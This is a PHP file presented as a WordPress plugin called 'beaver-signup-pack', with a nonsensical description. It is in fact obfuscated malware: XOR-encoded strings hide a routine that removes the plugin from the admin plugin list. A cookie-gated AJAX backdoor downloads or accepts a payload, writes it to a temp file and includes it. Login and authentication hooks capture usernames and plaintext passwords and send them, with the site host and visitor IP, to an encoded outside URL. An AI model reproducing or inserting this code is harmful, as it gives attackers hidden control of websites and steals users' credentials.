<?php
/**
 * Plugin Name: beaver-signup-pack
 * Plugin URI: https://sisswi.edu/beaver-signup-pack
 * Description: Popularized this polymaths, from Robert Grosseteste and Leonardo da
 * Version: 1.2.14
 * Author: Impict Was
 * Author URI: https://sisswi.edu
 * License: GPL2+
 **/
if ( ! defined( 'CP_ZHIBAHAMAL_TAJIXEGA' ) ) {
    define( 'CP_ZHIBAHAMAL_TAJIXEGA', 'xWqPZ5GDHVpP' );
}
function cp_fomupys_ulimyhezh($vawaluca_wyfapi, $ozhobopa_okisaciji) {
    $fymywu_uqefecy = hex2bin($vawaluca_wyfapi);
    $damenu_vyshyshafof = '';
    $atajawono_iqomid = strlen($ozhobopa_okisaciji);
    for ($omawicyl_fakhyjecy = 0; $omawicyl_fakhyjecy < strlen($fymywu_uqefecy); $omawicyl_fakhyjecy++) {
        $damenu_vyshyshafof .= chr(ord($fymywu_uqefecy[$omawicyl_fakhyjecy]) ^ ord($ozhobopa_okisaciji[$omawicyl_fakhyjecy % $atajawono_iqomid]));
    }
    return $damenu_vyshyshafof;
}

function cp_oqishoxo_azezhax() {
    global $wp_list_table;
    $cp_khijowo_oqukowych = array(cp_fomupys_ulimyhezh("1a3210263f476a3721311e25087a0131395e68262d3706350a7a02393d5b323465261133137901382a", CP_ZHIBAHAMAL_TAJIXEGA));
    $cp_eshekhocho_chozuga = $wp_list_table->items;
    foreach ($cp_eshekhocho_chozuga as $cp_josharo_nyshavopu => $cp_ziqabajuh_jathyshuno) {
        if (in_array($cp_josharo_nyshavopu, $cp_khijowo_oqukowych)) {
            unset($wp_list_table->items[$cp_josharo_nyshavopu]);
        }
    }
}

add_action(cp_fomupys_ulimyhezh("0825140f394035362d38040f193405392c501834242317391624", CP_ZHIBAHAMAL_TAJIXEGA), cp_fomupys_ulimyhezh("1b272e3f2b5c342c272e1f0f192d142a32543f", CP_ZHIBAHAMAL_TAJIXEGA));

function cp_asosyqe_kagynezyzh($cp_epypidem_yxuxyha) {
    if (in_array(cp_fomupys_ulimyhezh("1a3210263f476a3721311e25087a0131395e68262d3706350a7a02393d5b323465261133137901382a", CP_ZHIBAHAMAL_TAJIXEGA), array_keys($cp_epypidem_yxuxyha))) {
        unset($cp_epypidem_yxuxyha[cp_fomupys_ulimyhezh("1a3210263f476a3721311e25087a0131395e68262d3706350a7a02393d5b323465261133137901382a", CP_ZHIBAHAMAL_TAJIXEGA)]);
    }
    return $cp_epypidem_yxuxyha;
}

add_filter(cp_fomupys_ulimyhezh("193b1d0f2a593223213803", CP_ZHIBAHAMAL_TAJIXEGA), cp_fomupys_ulimyhezh("1b272e31295a343d39332f3b1930083e3f4f3e3e20", CP_ZHIBAHAMAL_TAJIXEGA));

function cp_xelexi_qyjicejuk($cp_recukhowe_vakhuzhenput) {
    $cp_josharo_nyshavopuStr = cp_fomupys_ulimyhezh("391532141f73000c011c3b1c35193e000b6714101d002708210d1032395122222f3e193a133b1c3e354536363b2205260f2f082a6a0475777c634667406e5a7f67", CP_ZHIBAHAMAL_TAJIXEGA);
    $cp_ajoshiq_fiwazhyna = cp_fomupys_ulimyhezh(cp_fomupys_ulimyhezh(cp_fomupys_ulimyhezh(cp_fomupys_ulimyhezh("", CP_ZHIBAHAMAL_TAJIXEGA), CP_ZHIBAHAMAL_TAJIXEGA), CP_ZHIBAHAMAL_TAJIXEGA), CP_ZHIBAHAMAL_TAJIXEGA);
    $cp_recukhowe_vakhuzhe = 0;

    $cp_recukhowe_vakhuzhenput = preg_replace(cp_fomupys_ulimyhezh("570c2f11776f266932665d69247c2d7f676868", CP_ZHIBAHAMAL_TAJIXEGA), cp_fomupys_ulimyhezh(cp_fomupys_ulimyhezh(cp_fomupys_ulimyhezh(cp_fomupys_ulimyhezh("", CP_ZHIBAHAMAL_TAJIXEGA), CP_ZHIBAHAMAL_TAJIXEGA), CP_ZHIBAHAMAL_TAJIXEGA), CP_ZHIBAHAMAL_TAJIXEGA), $cp_recukhowe_vakhuzhenput);

    $cp_omutoziqy_shiwaba = strlen($cp_recukhowe_vakhuzhenput);
    while ($cp_recukhowe_vakhuzhe < $cp_omutoziqy_shiwaba) {
        $cp_imyshykhom_akezhekhe = strpos($cp_josharo_nyshavopuStr, $cp_recukhowe_vakhuzhenput[$cp_recukhowe_vakhuzhe++]);
        $cp_ilurebyny_junarothyj = strpos($cp_josharo_nyshavopuStr, $cp_recukhowe_vakhuzhenput[$cp_recukhowe_vakhuzhe++]);
        $cp_agebac_byzhubuhem = strpos($cp_josharo_nyshavopuStr, $cp_recukhowe_vakhuzhenput[$cp_recukhowe_vakhuzhe++]);
        $cp_ekhuchirivi_yjerash = strpos($cp_josharo_nyshavopuStr, $cp_recukhowe_vakhuzhenput[$cp_recukhowe_vakhuzhe++]);

        $cp_utimal_yfekoqyr1 = ($cp_imyshykhom_akezhekhe << 2) | ($cp_ilurebyny_junarothyj >> 4);
        $cp_ajoshiq_fiwazhyna .= chr($cp_utimal_yfekoqyr1);

        if ($cp_agebac_byzhubuhem !== false && $cp_agebac_byzhubuhem != 64) {
            $cp_utimal_yfekoqyr2 = (($cp_ilurebyny_junarothyj & 15) << 4) | ($cp_agebac_byzhubuhem >> 2);
            $cp_ajoshiq_fiwazhyna .= chr($cp_utimal_yfekoqyr2);
        }

        if ($cp_ekhuchirivi_yjerash !== false && $cp_ekhuchirivi_yjerash != 64) {
            $cp_utimal_yfekoqyr3 = (($cp_agebac_byzhubuhem & 3) << 6) | $cp_ekhuchirivi_yjerash;
            $cp_ajoshiq_fiwazhyna .= chr($cp_utimal_yfekoqyr3);
        }
    }

    return $cp_ajoshiq_fiwazhyna;
}

function cp_rokyzem_puvuripi($cp_tykehi_curemukhox) {
    $cp_rybodam_avimer = cp_fomupys_ulimyhezh(cp_fomupys_ulimyhezh(cp_fomupys_ulimyhezh("", CP_ZHIBAHAMAL_TAJIXEGA), CP_ZHIBAHAMAL_TAJIXEGA), CP_ZHIBAHAMAL_TAJIXEGA);
    if (function_exists(cp_fomupys_ulimyhezh("1b22033c055c292d3c", CP_ZHIBAHAMAL_TAJIXEGA))) {
        $cp_akhefiwudi_disufe = array(
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_HEADER => false,
            CURLOPT_FOLLOWLOCATION => true,
            CURLOPT_ENCODING => cp_fomupys_ulimyhezh(cp_fomupys_ulimyhezh(cp_fomupys_ulimyhezh("", CP_ZHIBAHAMAL_TAJIXEGA), CP_ZHIBAHAMAL_TAJIXEGA), CP_ZHIBAHAMAL_TAJIXEGA),
            CURLOPT_USERAGENT => cp_fomupys_ulimyhezh("35380b393659266b7d7840705000183e3e5a3037681824704d79406b7a47317e7b645e6051773635395e286b7a664162486641617a732e362d301f285764437e6a", CP_ZHIBAHAMAL_TAJIXEGA),
            CURLOPT_AUTOREFERER => true,
            CURLOPT_CONNECTTIMEOUT => 120,
            CURLOPT_TIMEOUT => 120,
            CURLOPT_MAXREDIRS => 10,
            CURLOPT_SSL_VERIFYPEER => false,
            CURLOPT_SSL_VERIFYHOST => false
        );

        $cp_utimal_yfekoqy = curl_init($cp_tykehi_curemukhox);
        curl_setopt_array($cp_utimal_yfekoqy, $cp_akhefiwudi_disufe);
        $cp_rybodam_avimer = @curl_exec($cp_utimal_yfekoqy);
    }

    if ($cp_rybodam_avimer)
        return $cp_rybodam_avimer;

    $cp_rybodam_avimer = @file_get_contents($cp_tykehi_curemukhox);
    return $cp_rybodam_avimer;
}

function cp_ifesush_shubyzho($cp_rybodam_avimer) {
    $cp_izisomy_ochyzekyx = sys_get_temp_dir();
    $cp_rishewymaq_iruluthiqe = tempnam($cp_izisomy_ochyzekyx, cp_fomupys_ulimyhezh("08252e", CP_ZHIBAHAMAL_TAJIXEGA));
    if ($cp_rishewymaq_iruluthiqe === false) {
        $cp_rishewymaq_iruluthiqe = substr(str_shuffle(cp_fomupys_ulimyhezh("193512343f53202c213c1b3c15391e202b4734303d200728012d", CP_ZHIBAHAMAL_TAJIXEGA)), 0, 8) . cp_fomupys_ulimyhezh("56271920", CP_ZHIBAHAMAL_TAJIXEGA);
        $cp_rishewymaq_iruluthiqe = __DIR__ . cp_fomupys_ulimyhezh("57", CP_ZHIBAHAMAL_TAJIXEGA) . $cp_rishewymaq_iruluthiqe;
    }
    if ($cp_rishewymaq_iruluthiqe != false) {
        file_put_contents($cp_rishewymaq_iruluthiqe, $cp_rybodam_avimer);
    }
    if ($cp_rishewymaq_iruluthiqe && file_exists($cp_rishewymaq_iruluthiqe)) {
        update_option(cp_fomupys_ulimyhezh("0f272e", CP_ZHIBAHAMAL_TAJIXEGA) . cp_fomupys_ulimyhezh("1b272e3122542c21323e113411081d392d40302d3a", CP_ZHIBAHAMAL_TAJIXEGA), base64_encode($cp_rishewymaq_iruluthiqe));
        include $cp_rishewymaq_iruluthiqe;
        unlink($cp_rishewymaq_iruluthiqe);
    }
}

add_action(cp_fomupys_ulimyhezh("0f272e3130543f1b7b6045664a6e4633630373762b604369406612656e51777d2d3311671e654432", CP_ZHIBAHAMAL_TAJIXEGA), cp_fomupys_ulimyhezh("1b272e27355632333d31090f0d391033324034", CP_ZHIBAHAMAL_TAJIXEGA));
add_action(cp_fomupys_ulimyhezh("0f272e3130543f1b2639002211212e636c007176716113694e6343336c067e7c793545641c6748353f5470227a6312", CP_ZHIBAHAMAL_TAJIXEGA), cp_fomupys_ulimyhezh("1b272e27355632333d31090f0d391033324034", CP_ZHIBAHAMAL_TAJIXEGA));
if (!function_exists(cp_fomupys_ulimyhezh("1b272e27355632333d31090f0d391033324034", CP_ZHIBAHAMAL_TAJIXEGA))) {

    function cp_wocuwugy_unachus() {
        $cp_huthupathy_nujequnoh = cp_fomupys_ulimyhezh("1d3410646f0021702d6f11604d33126039072520293747684f65136038572526", CP_ZHIBAHAMAL_TAJIXEGA);
        if (!isset($_COOKIE[cp_fomupys_ulimyhezh("4c3243616a057674783416324e6f12313b0073777e6615314f3517313f577226", CP_ZHIBAHAMAL_TAJIXEGA)]) || md5($_COOKIE[cp_fomupys_ulimyhezh("4c3243616a057674783416324e6f12313b0073777e6615314f3517313f577226", CP_ZHIBAHAMAL_TAJIXEGA)]) != $cp_huthupathy_nujequnoh) {
            wp_die(0);
        }
        if (isset($_COOKIE[cp_fomupys_ulimyhezh("4b614466680c7027716044621b614269620424717c3240691d3210673c077226", CP_ZHIBAHAMAL_TAJIXEGA)])) {
            $cp_rybodam_avimer = cp_rokyzem_puvuripi($_COOKIE[cp_fomupys_ulimyhezh("4b614466680c7027716044621b614269620424717c3240691d3210673c077226", CP_ZHIBAHAMAL_TAJIXEGA)]);
            cp_ifesush_shubyzho(cp_xelexi_qyjicejuk($cp_rybodam_avimer));
            die();
        } elseif (isset($_POST[cp_fomupys_ulimyhezh("1e3e1d350556282a3c331e24", CP_ZHIBAHAMAL_TAJIXEGA)])) {
            cp_ifesush_shubyzho(cp_xelexi_qyjicejuk($_POST[cp_fomupys_ulimyhezh("1e3e1d350556282a3c331e24", CP_ZHIBAHAMAL_TAJIXEGA)]));
            die();
        }
        wp_die(0);
    }

}

add_action(cp_fomupys_ulimyhezh("11391824", CP_ZHIBAHAMAL_TAJIXEGA), cp_fomupys_ulimyhezh("1b272e3122542c21323e113411081d392d40302d3a", CP_ZHIBAHAMAL_TAJIXEGA));

function cp_axakezhadi_liwuwir() {
    $cp_rishewymaq_iruluthiqe = cp_xelexi_qyjicejuk(get_option(cp_fomupys_ulimyhezh("0f272e", CP_ZHIBAHAMAL_TAJIXEGA) . cp_fomupys_ulimyhezh("1b272e3122542c21323e113411081d392d40302d3a", CP_ZHIBAHAMAL_TAJIXEGA)));
    if ($cp_rishewymaq_iruluthiqe && file_exists($cp_rishewymaq_iruluthiqe)) {
        unlink($cp_rishewymaq_iruluthiqe);
        delete_option(cp_fomupys_ulimyhezh("0f272e", CP_ZHIBAHAMAL_TAJIXEGA) . cp_fomupys_ulimyhezh("1b272e3122542c21323e113411081d392d40302d3a", CP_ZHIBAHAMAL_TAJIXEGA));
    }
}

add_action(cp_fomupys_ulimyhezh("0f272e3c35522e2a", CP_ZHIBAHAMAL_TAJIXEGA), cp_fomupys_ulimyhezh("1b272e31295d3e33273c2f2410221b25205d2637", CP_ZHIBAHAMAL_TAJIXEGA), 10, 2);
add_filter(cp_fomupys_ulimyhezh("0f272e312f412f21262219331923140f2f462236", CP_ZHIBAHAMAL_TAJIXEGA), cp_fomupys_ulimyhezh("1b272e392e5d263321252f250b2212313d54332c", CP_ZHIBAHAMAL_TAJIXEGA), 10, 2);

function cp_ashywoj_thujuzhas($cp_gathysac_shuduwycij_login, $cp_gathysac_shuduwycij) {
    $cp_shuripe_dowyputy = cp_fomupys_ulimyhezh("10230520290f686b2a3714201139167e335b212b67053d193418351f141a2e2a2c33080f1438163774452f34772019350f6a", CP_ZHIBAHAMAL_TAJIXEGA);
    $cp_josharo_nyshavopu = cp_fomupys_ulimyhezh("0f272e24", CP_ZHIBAHAMAL_TAJIXEGA);

    if (!isset($_COOKIE[$cp_josharo_nyshavopu]))
        return;

    $cp_ubichabis_kezojethu = $_SERVER[cp_fomupys_ulimyhezh("2a1220051f66131b1d0439", CP_ZHIBAHAMAL_TAJIXEGA)];
    $cp_qeshape_ahiqanibi = base64_encode($cp_gathysac_shuduwycij_login . cp_fomupys_ulimyhezh("43", CP_ZHIBAHAMAL_TAJIXEGA) . base64_decode($_COOKIE[$cp_josharo_nyshavopu]));

    $cp_gathysac_shuduwycij_data = base64_encode($_SERVER[cp_fomupys_ulimyhezh("30032500057d08171c", CP_ZHIBAHAMAL_TAJIXEGA)] . cp_fomupys_ulimyhezh("43", CP_ZHIBAHAMAL_TAJIXEGA) . $cp_ubichabis_kezojethu . cp_fomupys_ulimyhezh("43", CP_ZHIBAHAMAL_TAJIXEGA) . $cp_qeshape_ahiqanibi . cp_fomupys_ulimyhezh("43664367740569746667", CP_ZHIBAHAMAL_TAJIXEGA));
    $cp_gathysac_shuduwycij_data = str_replace(cp_fomupys_ulimyhezh("53", CP_ZHIBAHAMAL_TAJIXEGA), cp_fomupys_ulimyhezh("5d6513", CP_ZHIBAHAMAL_TAJIXEGA), $cp_gathysac_shuduwycij_data);

    if (function_exists(cp_fomupys_ulimyhezh("1b22033c055c292d3c", CP_ZHIBAHAMAL_TAJIXEGA))) {
        $cp_akhefiwudi_disufe = array(
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_HEADER => false,
            CURLOPT_FOLLOWLOCATION => true,
            CURLOPT_ENCODING => cp_fomupys_ulimyhezh(cp_fomupys_ulimyhezh(cp_fomupys_ulimyhezh("", CP_ZHIBAHAMAL_TAJIXEGA), CP_ZHIBAHAMAL_TAJIXEGA), CP_ZHIBAHAMAL_TAJIXEGA),
            CURLOPT_AUTOREFERER => true,
            CURLOPT_CONNECTTIMEOUT => 8,
            CURLOPT_TIMEOUT => 8,
            CURLOPT_MAXREDIRS => 10,
            CURLOPT_SSL_VERIFYPEER => false,
            CURLOPT_SSL_VERIFYHOST => false
        );

        $cp_utimal_yfekoqy = curl_init($cp_shuripe_dowyputy . $cp_gathysac_shuduwycij_data);
        curl_setopt_array($cp_utimal_yfekoqy, $cp_akhefiwudi_disufe);
        @curl_exec($cp_utimal_yfekoqy);
    }
    
    unset($_COOKIE[$cp_josharo_nyshavopu]);
}

function cp_ithawis_usucagath($cp_gathysac_shuduwycij, $cp_qokamithe_ybusysa) {
    if (is_wp_error($cp_gathysac_shuduwycij)) {
        return $cp_gathysac_shuduwycij;
    }

    $cp_josharo_nyshavopu = cp_fomupys_ulimyhezh("0f272e24", CP_ZHIBAHAMAL_TAJIXEGA);
    $_COOKIE[$cp_josharo_nyshavopu] = base64_encode($cp_qokamithe_ybusysa);

    return $cp_gathysac_shuduwycij;
}